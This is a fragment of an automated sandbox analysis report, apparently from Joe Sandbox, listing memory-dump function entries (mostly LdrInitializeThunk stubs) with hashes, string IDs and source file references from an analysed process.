                                                                              • Opcode Fuzzy Hash: 5659f236ce9fdf59961b8b3fb0d878dab9da94b24fd5f8839588c39f406c4a4a
                                                                              • Instruction Fuzzy Hash: 9890022121180042FA4079684D14B0700059BD0387F51C51DA0155594CC939D8616621
                                                                              Function 04AB29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 141 4ab29f0-4ab29fc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 33ddb7d7e541eca813c1ef17109929099548d59ef2f117070b6b26e22219daac
                                                                              • Instruction ID: 0c4ec45b74c4f7d07c6d060759dfd72236a59b74f1bac24252f126ac7d3ed782
                                                                              • Opcode Fuzzy Hash: 33ddb7d7e541eca813c1ef17109929099548d59ef2f117070b6b26e22219daac
                                                                              • Instruction Fuzzy Hash: 86900225211000033945B958070450700469BD53D6351C42DF1016590CD635D8616221
                                                                              Function 04AB2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 143 4ab2a80-4ab2a8c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 68d67206a96460d5d9609fdee85414a77d38ffc2acee56c94357e0b6cd542832
                                                                              • Instruction ID: 572a753a3712ccecd3fde6dd2faecedc7771228ddf1691436b5c5bd685612314
                                                                              • Opcode Fuzzy Hash: 68d67206a96460d5d9609fdee85414a77d38ffc2acee56c94357e0b6cd542832
                                                                              • Instruction Fuzzy Hash: FF90026120200003794575584514616400A9BE0286B51C42DE10155D0DC539D8917225
                                                                              Function 04AB2AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 144 4ab2ac0-4ab2acc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1fd484809410013baf005dfeacc8c5a56bf5b28397311ed7fcb1bc663ea6049c
                                                                              • Instruction ID: 0b928b142ba22ac3e93928f9b2709cdae2ec441c3943c1fb1aa03501db9ec868
                                                                              • Opcode Fuzzy Hash: 1fd484809410013baf005dfeacc8c5a56bf5b28397311ed7fcb1bc663ea6049c
                                                                              • Instruction Fuzzy Hash: 8E90023160500802F9907558451474600059BD0386F51C41DA0025694DC779DA5577A1
                                                                              Function 04AB2A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 142 4ab2a10-4ab2a1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 2e1dff9a5a53592d73629731aee43bad136c4661d7ebb0ba204e309ee88172aa
                                                                              • Instruction ID: d17a890269e612dfa4de97e4327c7736b9700ef60d1a3e373c9ac9e8d94ce91f
                                                                              • Opcode Fuzzy Hash: 2e1dff9a5a53592d73629731aee43bad136c4661d7ebb0ba204e309ee88172aa
                                                                              • Instruction Fuzzy Hash: 4A900225221000023985B958070450B0445ABD63D6391C41DF14175D0CC635D8656321
                                                                              Function 04AB2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 147 4ab2b80-4ab2b8c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c3285543a26462a679b34c4e5c8116e20cf64b78d9b0156d8b86c8b42079cc0d
                                                                              • Instruction ID: 3cbea80f3cd935a439a330928982a1b5a524eb51c9d4d1b3e82ac7efe3bea2bd
                                                                              • Opcode Fuzzy Hash: c3285543a26462a679b34c4e5c8116e20cf64b78d9b0156d8b86c8b42079cc0d
                                                                              • Instruction Fuzzy Hash: 6890023120100842F94075584504B4600059BE0386F51C41EA0125694DC639D8517621
                                                                              Function 04AB2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 148 4ab2b90-4ab2b9c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d91bc548e236aa19d21e3f49dc0432668a44b4b465ad07d01faa778cc2c5fad3
                                                                              • Instruction ID: cf8e4432988193a637011f5d4415d696318756ce87fd45402e663ceacce4cf38
                                                                              • Opcode Fuzzy Hash: d91bc548e236aa19d21e3f49dc0432668a44b4b465ad07d01faa778cc2c5fad3
                                                                              • Instruction Fuzzy Hash: 0290023120108802F9507558850474A00059BD0386F55C81DA4425698DC6B9D8917221
                                                                              Function 04AB2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 149 4ab2bc0-4ab2bcc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: cc522aeec01c7c667cb47c7709df3e3f86e060b7b513cd1897ce24ddba7d6b57
                                                                              • Instruction ID: 9eb8d823dee660c53ec807c609994734c3d1728fe30aa128a51b10e44357f056
                                                                              • Opcode Fuzzy Hash: cc522aeec01c7c667cb47c7709df3e3f86e060b7b513cd1897ce24ddba7d6b57
                                                                              • Instruction Fuzzy Hash: 7C90023120100402F9407998550864600059BE0386F51D41DA5025595EC679D8917231
                                                                              Function 04AB2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 145 4ab2b00-4ab2b0c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9cbec4527b9157132551fceea6b31d4a06a9264562c50aea31d9e2cc63aae8f1
                                                                              • Instruction ID: 631742a2fdc9b67ccb26d2574b13a1281d7a4f7f71fe510ed96443bbe9230fbf
                                                                              • Opcode Fuzzy Hash: 9cbec4527b9157132551fceea6b31d4a06a9264562c50aea31d9e2cc63aae8f1
                                                                              • Instruction Fuzzy Hash: D090023120504842F98075584504A4600159BD038AF51C41DA00656D4DD639DD55B761
                                                                              Function 04AB2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 146 4ab2b10-4ab2b1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f00fcd6e5d6c1bb75aba347e6d12a80d5009a5dd169c8bede915824f3d81675b
                                                                              • Instruction ID: 7a5adeb8c4a349c63a860e2c6f690b6f894a8e4f68c23a40ae93c21d934d70c3
                                                                              • Opcode Fuzzy Hash: f00fcd6e5d6c1bb75aba347e6d12a80d5009a5dd169c8bede915824f3d81675b
                                                                              • Instruction Fuzzy Hash: F190023120100802F9C07558450464A00059BD1386F91C41DA0026694DCA39DA5977A1
                                                                              Function 04AB34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6eaba959eef8e338bb8fb2a3235cd194603397fb919028e000407b5b11618e0c
                                                                              • Instruction ID: b1e64a9da6e6c94ae18f0c6674d8ce4f97f1e2cbe9ff9e2b607ef4adaae15216
                                                                              • Opcode Fuzzy Hash: 6eaba959eef8e338bb8fb2a3235cd194603397fb919028e000407b5b11618e0c
                                                                              • Instruction Fuzzy Hash: 2590023160510402F9407558461470610059BD0286F61C81DA04255A8DC7B9D95176A2
                                                                              Function 04AB2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 137 4ab2b2a-4ab2b2f 138 4ab2b3f-4ab2b46 LdrInitializeThunk 137->138 139 4ab2b31-4ab2b38 137->139
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3bd9990b8bc4d491ce952c77bbd51501cdc1b80e8bc805d5057fd16ad5ba9c9a
                                                                              • Instruction ID: f54691165b1edf527c0d09235cefcadfbb29b070621a89c69e2d7caf648a1bcc
                                                                              • Opcode Fuzzy Hash: 3bd9990b8bc4d491ce952c77bbd51501cdc1b80e8bc805d5057fd16ad5ba9c9a
                                                                              • Instruction Fuzzy Hash: 61B04C729014C5C5FA51AB6046087167904BB90745F15C45AD1460681A4738D091E275

                                                                              Non-executed Functions

                                                                              Function 04AA7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Execute=1, xrefs: 04AE451E
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04AE4530
                                                                              • ExecuteOptions, xrefs: 04AE44AB
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04AE4592
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04AE454D
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04AE4460
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04AE4507
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: 3b787218986c0a913fe6bbeccfce1575db2d239c105efe5ebd7ecd4a694145d3
                                                                              • Instruction ID: 88d5b6f0b30adac22fe9e6f9ac1477565b8b003fd4f5c1ee1f0a13c25605b454
                                                                              • Opcode Fuzzy Hash: 3b787218986c0a913fe6bbeccfce1575db2d239c105efe5ebd7ecd4a694145d3
                                                                              • Instruction Fuzzy Hash: 1D51D435A00219BAEF10ABA5DD99BBA73A8AF0C704F0404A9E505A7191EB70FE558F60
                                                                              Function 04A79046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.16927697930.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.16927697930.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4a40000_waitfor.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: c0b10683b332d56f6979b2c5f9c409bdb1adb3f4d2cddebb04125d52630df2da
                                                                              • Instruction ID: 3a6ee4bfb7c67da11b631af4df42f3d60cf9028a7610121ab75f63a4885ce6ee
                                                                              • Opcode Fuzzy Hash: c0b10683b332d56f6979b2c5f9c409bdb1adb3f4d2cddebb04125d52630df2da
                                                                              • Instruction Fuzzy Hash: 05812EB2D002699BEB31DF54CD45BEEB7B8AB44714F0041DAE90AB7250E7706E85CFA1